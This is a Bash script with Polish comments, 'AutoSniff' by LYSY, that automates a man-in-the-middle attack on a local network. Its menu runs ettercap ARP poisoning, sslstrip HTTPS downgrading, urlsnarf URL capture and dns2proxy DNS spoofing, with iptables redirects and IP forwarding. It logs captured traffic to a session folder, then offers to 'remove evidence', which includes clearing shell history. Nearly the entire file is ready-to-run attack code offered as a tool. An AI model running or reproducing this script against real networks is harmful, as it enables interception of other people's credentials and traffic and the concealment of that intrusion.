#!/bin/bash
# AutoSniff Script v1.1by LYSY

version="1.1"

# LOGO
function logo
{
	echo
	echo "     ▄▄▄       █    ██ ▄▄▄█████▓ ▒█████    "
	echo "    ▒████▄     ██  ▓██▒▓  ██▒ ▓▒▒██▒  ██▒  "
	echo "    ▒██  ▀█▄  ▓██  ▒██░▒ ▓██░ ▒░▒██░  ██▒  "
	echo "    ░██▄▄▄▄██ ▓▓█  ░██░░ ▓██▓ ░ ▒██   ██░  "
	echo "     ▓█   ▓██▒▒▒█████▓   ▒██▒ ░ ░ ████▓▒░  "
	echo "     ▒▒   ▓▒█░░▒▓▒ ▒ ▒   ▒ ░░   ░ ▒░▒░▒░   "
	echo "      ▒   ▒▒ ░░░▒░ ░ ░     ░      ░ ▒ ▒░   "
	echo "      ░   ▒    ░░░ ░ ░   ░      ░ ░ ░ ▒    "
	echo "          ░  ░   ░                  ░ ░    "
	echo "                                       "
	echo "      ██████  ███▄    █  ██▓  █████▒ █████▒"
	echo "    ▒██    ▒  ██ ▀█   █ ▓██▒▓██   ▒▓██   ▒ "
	echo "    ░ ▓██▄   ▓██  ▀█ ██▒▒██▒▒████ ░▒████ ░ "
	echo "      ▒   ██▒▓██▒  ▐▌██▒░██░░▓█▒  ░░▓█▒  ░ "
	echo "    ▒██████▒▒▒██░   ▓██░░██░░▒█░   ░▒█░    "
	echo "    ▒ ▒▓▒ ▒ ░░ ▒░   ▒ ▒ ░▓   ▒ ░    ▒ ░    "
	echo "    ░ ░▒  ░ ░░ ░░   ░ ▒░ ▒ ░ ░      ░      "
	echo "    ░  ░  ░     ░   ░ ░  ▒ ░ ░ ░    ░ ░    "
	echo "          ░           ░  ░                 "
	echo
	echo -e "           \e[1;33mAutoSniff\e[21;90m by LYSY v$version\e[21;39m"
	echo
}

	# FUNKCJA ZACHOWYWANIA SESJI
	function session
	{
		logo
		echo -e "\e[1mCzy chcesz zachować sesje? [T / N]\e[0m"
		echo
		echo -ne "\e[1;31mAutoSniff\e[21;0m:~# "
		read -e ODP
		echo

		# Usuwanie sesji
		if [ $ODP = "N" ] ; then
			rm -r /root/$SESSION/
			echo -e "\e[1mSesja '\e[31m$SESSION\e[39m' została usunięta!\e[0m"
			echo
			read
		elif [ $ODP = "T" ] ; then
			echo -e "\e[1mSesja została zapisana w '\e[31m/root/$SESSION/'\e[0m"
			echo
			read
		elif [ $ODP = "q" ]; then
			exit
		else
			session
		fi
		
		clear
		echo
		echo -e "\e[1;32m[+]\e[21m \e[32mWszystko pozamiatane!\e[1m Możesz spokojnie zamknąć terminal.\e[0m"
		echo
		exit
	}

	# GLOWNA FUNKCJA Z ZAPISEM SESJI
	function mainsave
	{
		xterm -geometry 73x35+1+300 -hold -e ifconfig &
		clear

		# Pobieranie informacji
		logo
		echo -ne "\e[1;32mJaki interfejs wybierasz?: \e[1;39m"
		read -e INTERFEJS
		killall xterm
		echo -ne "\e[1;32mNazwa sesji (do zapisu logu): \e[1;39m"
		read -e SESSION
		clear

		# Glowne menu
		logo
		echo -e "\e[1mWybierz wersje programu:\e[21m"
		echo
		echo -e "\e[1m1 - \e[94mLite\e[39m (ettercap + TCP)"
		echo -e "2 - Standard (ettercap + TCP + sslstrip)"
		echo -e "3 - \e[91mPro\e[39m (ettercap + TCP + sslstrip + DNS2proxy)"
		echo -e "4 - \e[93mMAX\e[39m (ettercap + TCP/UDP + sslstrip + DNS2proxy)\e[0m"
		echo
		echo -n -e "\e[1;31mAutoSniff\e[21;0m:~# "
		read -e WERSJA

		# Tworzenie sesji
		mkdir /root/$SESSION/

		# Podsumowanie
		echo
		echo -e "Interfejs sieci: '\e[1m$INTERFEJS\e[21m'"
		echo -e "Nazwa sesji: '\e[1m$SESSION\e[21m'"
		echo -e "Wersja programu: '\e[1m$WERSJA\e[21m'"
		echo -e "Naciśnij \e[1mENTER\e[21m, jeżeli wszystko się zgadza."
		read
		clear
		logo

		# WERSJA 1
		if [ $WERSJA = "1" ] ; then

			# Ustawianie Interfejsu
			echo
			echo -e "\e[1;32m[+]\e[1;39m Ustawienia listy adresów...\e[21;90m"
			echo 1 > /proc/sys/net/ipv4/ip_forward
			iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
			sleep 2

			# Ettercap
			echo
			echo -e "\e[1;32m[+]\e[1;39m Uruchamianie Ettercap...\e[21;90m"
			xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -hold -e ettercap -Tq -P autoadd -i $INTERFEJS -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp &
			cat /proc/sys/net/ipv4/ip_forward
			iptables -t nat -L
			sleep 1

		# WERSJA 2
		elif [ $WERSJA = "2" ] ; then

			# Ustawianie Interfejsu
			echo
			echo -e "\e[1;32m[+]\e[1;39m Ustawienia listy adresów...\e[21;90m"
			echo 1 > /proc/sys/net/ipv4/ip_forward
			iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
			sleep 2

			# URLsnarf
			echo -e "\e[1;32m[+]\e[1;39m Uruchamianie URLsnarf...\e[21;90m"
			urlsnarf -i $INTERFEJS | grep http > /root/$SESSION/$SESSION.txt &
			sleep 2

			# SSLstrip
			echo -e "\e[1;32m[+]\e[1;39m Uruchamianie SSLstrip...\e[21;90m"
			xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -s -k -w /root/$SESSION/$SESSION.log &
			sleep 2

			# Ettercap
			echo
			echo -e "\e[1;32m[+]\e[1;39m Uruchamianie Ettercap...\e[21;90m"
			xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -hold -e ettercap -Tq -P autoadd -i $INTERFEJS -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp &
			cat /proc/sys/net/ipv4/ip_forward
			iptables -t nat -L
			sleep 1

		# WERSJA 3
		elif [ $WERSJA = "3" ] ; then

			# Ustawianie Interfejsu
			echo
			echo -e "\e[1;32m[+]\e[1;39m Ustawienia listy adresów...\e[21;90m"
			echo 1 > /proc/sys/net/ipv4/ip_forward
			iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
			sleep 2

			# URLsnarf
			echo -e "\e[1;32m[+]\e[1;39m Uruchamianie URLsnarf...\e[21;90m"
			urlsnarf -i $INTERFEJS | grep http > /root/$SESSION/$SESSION.txt &
			sleep 2

			# SSLstrip
			echo -e "\e[1;32m[+]\e[1;39m Uruchamianie SSLstrip...\e[21;90m"
			xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -s -k -w /root/$SESSION/$SESSION.log &
			sleep 2

			# DNS2Proxy
			echo -e "\e[1;32m[+]\e[1;39m Uruchamianie DNS2Proxy...\e[21;90m"
			xterm -geometry 75x15+1+200 -T python -e python /bin/dns2proxy-master/dns2proxy.py &
			sleep 2

			# Ettercap
			echo
			echo -e "\e[1;32m[+]\e[1;39m Uruchamianie Ettercap...\e[21;90m"
			xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -hold -e ettercap -Tq -P autoadd -i $INTERFEJS -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp &
			cat /proc/sys/net/ipv4/ip_forward
			iptables -t nat -L
			sleep 1

		# WERSJA 4
		elif [ $WERSJA = "4" ] ; then

			# Ustawianie Interfejsu
			echo -e "\e[1;32m[+]\e[1;39m Ustawienia listy adresów...\e[21;90m"
			echo 1 > /proc/sys/net/ipv4/ip_forward
			iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
			iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53
			sleep 2

			# URLsnarf
			echo -e "\e[1;32m[+]\e[1;39m Uruchamianie URLsnarf...\e[21;90m"
			urlsnarf -i $INTERFEJS | grep http > /root/$SESSION/$SESSION.txt &
			sleep 2

			# SSLstrip
			echo -e "\e[1;32m[+]\e[1;39m Uruchamianie SSLstrip...\e[21;90m"
			xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -s -k -w /root/$SESSION/$SESSION.log &
			sleep 2

			# DNS2Proxy
			echo -e "\e[1;32m[+]\e[1;39m Uruchamianie DNS2Proxy...\e[21;90m"
			xterm -geometry 75x15+1+200 -T python -e python /bin/dns2proxy-master/dns2proxy.py &
			sleep 2

			# Ettercap
			echo
			echo -e "\e[1;32m[+]\e[1;39m Uruchamianie Ettercap...\e[21;90m"
			xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -hold -e ettercap -Tq -P autoadd -i $INTERFEJS -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp &
			cat /proc/sys/net/ipv4/ip_forward
			iptables -t nat -L
			sleep 1

		else
			clear
			echo
			echo -e "\e[1;91mWybrano nieprawidłową wersję!\e[0m"
			echo
			read
			mainsave
		fi

		echo
		echo -e "\e[1;31m[+]\e[1;39m UWAGA!\e[0m"
		echo -e "Po zakończeniu kliknij \e[1mENTER\e[21m by usunąć dowody i posprzatać!"
		echo
		read

		# Czyszczenie i usuwanie
		   echo
		   echo -e "\e[32m[+]\e[0m Usuwanie i czyszczenie...\e[21;90m"
		   echo
		   killall python
		   killall sslstrip
		   killall ettercap
		   killall urlsnarf
		   killall xterm
		   echo "0" > /proc/sys/net/ipv4/ip_forward
		   iptables --flush
		   iptables --table nat --flush
		   iptables --delete-chain
		   iptables --table nat --delete-chain
		   etterlog -p -i /root/$SESSION/$SESSION.eci
		   history -c
		   sleep 1
		   clear
	
		session

	}

	# GLOWNA FUNKCJA BEZ ZAPISU SESJI
	function mainnosave
	{
		xterm -geometry 73x35+1+300 -hold -e ifconfig &
		clear

		# Pobieranie informacji
		logo
		echo -ne "\e[1;32mJaki interfejs wybierasz?: \e[1;39m"
		read -e INTERFEJS
		killall xterm
		clear

		# Glowne menu
		logo
		echo -e "\e[1mWybierz wersje programu:\e[21m"
		echo
		echo -e "\e[1m1 - \e[94mLite\e[39m (ettercap + TCP)"
		echo -e "2 - Standard (ettercap + TCP + sslstrip)"
		echo -e "3 - \e[91mPro\e[39m (ettercap + TCP + sslstrip + DNS2proxy)"
		echo -e "4 - \e[93mMAX\e[39m (ettercap + TCP/UDP + sslstrip + DNS2proxy)\e[0m"
		echo
		echo -n -e "\e[1;31mAutoSniff\e[21;0m:~# "
		read -e WERSJA
		
		# Podsumowanie
		echo
		echo -e "Interfejs sieci: '\e[1m$INTERFEJS\e[21m'"
		echo -e "Wersja programu: '\e[1m$WERSJA\e[21m'"
		echo -e "Naciśnij \e[1mENTER\e[21m, jeżeli wszystko się zgadza."
		read
		clear
		logo

		# WERSJA 1
		if [ $WERSJA = "1" ] ; then

			# Ustawianie Interfejsu
			echo
			echo -e "\e[1;32m[+]\e[1;39m Ustawienia listy adresów...\e[21;90m"
			echo 1 > /proc/sys/net/ipv4/ip_forward
			iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
			sleep 2

			# Ettercap
			echo
			echo -e "\e[1;32m[+]\e[1;39m Uruchamianie Ettercap...\e[21;90m"
			xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -hold -e ettercap -Tq -P autoadd -i $INTERFEJS -M arp &
			cat /proc/sys/net/ipv4/ip_forward
			iptables -t nat -L
			sleep 1

		# WERSJA 2
		elif [ $WERSJA = "2" ] ; then

			# Ustawianie Interfejsu
			echo
			echo -e "\e[1;32m[+]\e[1;39m Ustawienia listy adresów...\e[21;90m"
			echo 1 > /proc/sys/net/ipv4/ip_forward
			iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
			echo
			sleep 2

			# SSLstrip
			echo -e "\e[1;32m[+]\e[1;39m Uruchamianie SSLstrip...\e[21;90m"
			xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -s -k &
			sleep 2

			# Ettercap
			echo
			echo -e "\e[1;32m[+]\e[1;39m Uruchamianie Ettercap...\e[21;90m"
			xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -hold -e ettercap -Tq -P autoadd -i $INTERFEJS -M arp &
			cat /proc/sys/net/ipv4/ip_forward
			iptables -t nat -L
			sleep 1

		# WERSJA 3
		elif [ $WERSJA = "3" ] ; then

			# Ustawianie Interfejsu
			echo
			echo -e "\e[1;32m[+]\e[1;39m Ustawienia listy adresów...\e[21;90m"
			echo 1 > /proc/sys/net/ipv4/ip_forward
			iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
			echo
			sleep 2

			# SSLstrip
			echo -e "\e[1;32m[+]\e[1;39m Uruchamianie SSLstrip...\e[21;90m"
			xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -s -k &
			sleep 2

			# DNS2Proxy
			echo -e "\e[1;32m[+]\e[1;39m Uruchamianie DNS2Proxy...\e[21;90m"
			xterm -geometry 75x15+1+200 -T python -e python /bin/dns2proxy-master/dns2proxy.py &
			sleep 2

			# Ettercap
			echo
			echo -e "\e[1;32m[+]\e[1;39m Uruchamianie Ettercap...\e[21;90m"
			xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -hold -e ettercap -Tq -P autoadd -i $INTERFEJS -M arp &
			cat /proc/sys/net/ipv4/ip_forward
			iptables -t nat -L
			sleep 1

		# WERSJA 4
		elif [ $WERSJA = "4" ] ; then

			# Ustawianie Interfejsu
			echo -e "\e[1;32m[+]\e[1;39m Ustawienia listy adresów...\e[21;90m"
			echo 1 > /proc/sys/net/ipv4/ip_forward
			iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
			iptables -t nat -A PREROUTING -p udp --destination-port 53 -j REDIRECT --to-port 53
			echo
			sleep 2

			# SSLstrip
			echo -e "\e[1;32m[+]\e[1;39m Uruchamianie SSLstrip...\e[21;90m"
			xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -s -k &
			sleep 2

			# DNS2Proxy
			echo -e "\e[1;32m[+]\e[1;39m Uruchamianie DNS2Proxy...\e[21;90m"
			xterm -geometry 75x15+1+200 -T python -e python /bin/dns2proxy-master/dns2proxy.py &
			sleep 2

			# Ettercap
			echo
			echo -e "\e[1;32m[+]\e[1;39m Uruchamianie Ettercap...\e[21;90m"
			xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -hold -e ettercap -Tq -P autoadd -i $INTERFEJS -M arp &
			cat /proc/sys/net/ipv4/ip_forward
			iptables -t nat -L
			sleep 1

		else
			clear
			echo
			echo -e "\e[1;91mWybrano nieprawidłową wersję!\e[0m"
			echo
			read
			mainnosave
		fi

		echo
		echo -e "\e[1;31m[+]\e[1;39m UWAGA!\e[0m"
		echo -e "Po zakończeniu kliknij \e[1mENTER\e[21m by usunąć dowody i posprzatać!"
		echo
		read

		# Czyszczenie i usuwanie
		   echo
		   echo -e "\e[32m[+]\e[0m Usuwanie i czyszczenie...\e[21;90m"
		   echo
		   killall python
		   killall sslstrip
		   killall ettercap
		   killall urlsnarf
		   killall xterm
		   echo "0" > /proc/sys/net/ipv4/ip_forward
		   iptables --flush
		   iptables --table nat --flush
		   iptables --delete-chain
		   iptables --table nat --delete-chain
		   etterlog -p -i /root/$SESSION/$SESSION.eci
		   history -c
		   sleep 1
		   clear

		   clear
		   echo
		   echo -e "\e[1;32m[+]\e[21m \e[32mWszystko pozamiatane!\e[1m Możesz spokojnie zamknąć terminal.\e[0m"
		   echo
		   exit
	}
	
# FUNKCJA STARTOWA
function start
{
	clear

	logo
	echo -e "\e[1mCzy chcesz włączyć opcję zapisu sesji? [T / N]\e[0m"
	echo
	echo -n -e "\e[1;31mAutoSniff\e[21;0m:~# "
	read -e save

	# Zapisywanie sesji
	if [ $save = "T" ]; then
		mainsave
	
	# Bez zapisu sesji
	elif [ $save = "N" ]; then
		mainnosave
	
	else
		start
	fi
}

start
